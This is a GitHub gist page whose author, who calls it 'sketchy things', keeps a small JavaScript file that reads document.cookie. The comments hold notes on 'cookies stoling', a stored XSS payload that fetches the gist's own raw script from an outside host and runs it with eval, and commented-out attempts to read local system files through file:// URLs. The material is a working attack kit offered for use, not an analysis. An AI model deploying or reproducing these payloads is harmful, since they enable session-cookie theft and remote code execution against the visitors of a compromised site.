Skip to content

Instantly share code, notes, and snippets.

@lostsh

lostsh/main.js

Last active May 31, 2022 12:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save lostsh/1a963d8593623ee5a18df37e5933bbef to your computer and use it in GitHub Desktop.
Save lostsh/1a963d8593623ee5a18df37e5933bbef to your computer and use it in GitHub Desktop.
Download ZIP
let's do some sketchy things
Raw
main.js
const interval = setTimeout(redirect, 5000);
function stopTimout() {
clearTimeout(interval);
}
function redirect(){
stopTimout();
console.log("Redirect");
console.log(document.cookie);
}
@lostsh
Copy link
Author

lostsh commented May 31, 2022

cookies stoling (need update)

some save :

function logCookies(cookies) {
  for (let cookie of cookies) {
    console.log(cookie.value);
  }
}

let gettingAll = browser.cookies.getAll({
  name: "favorite-color"
});
gettingAll.then(logCookies);
```

@lostsh
Copy link
Author

lostsh commented May 31, 2022

Payload stored in the site

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="function pwn(){fetch('https://gist.githubusercontent.com/lostsh/1a963d8593623ee5a18df37e5933bbef/raw/').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();"></xss>

@lostsh
Copy link
Author

lostsh commented May 31, 2022

//location.href = "file:///C:/Windows/System32";
//window.open("file:///c:/windows/system32/drivers/etc/hosts");
//document.body.innerHTML = "<iframe src="file://localhost/c:/windows/system32/drivers/etc/hosts" onload="alert(iframe.contentDocument.body.innerHTML)" id="iframe"></iframe>";

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment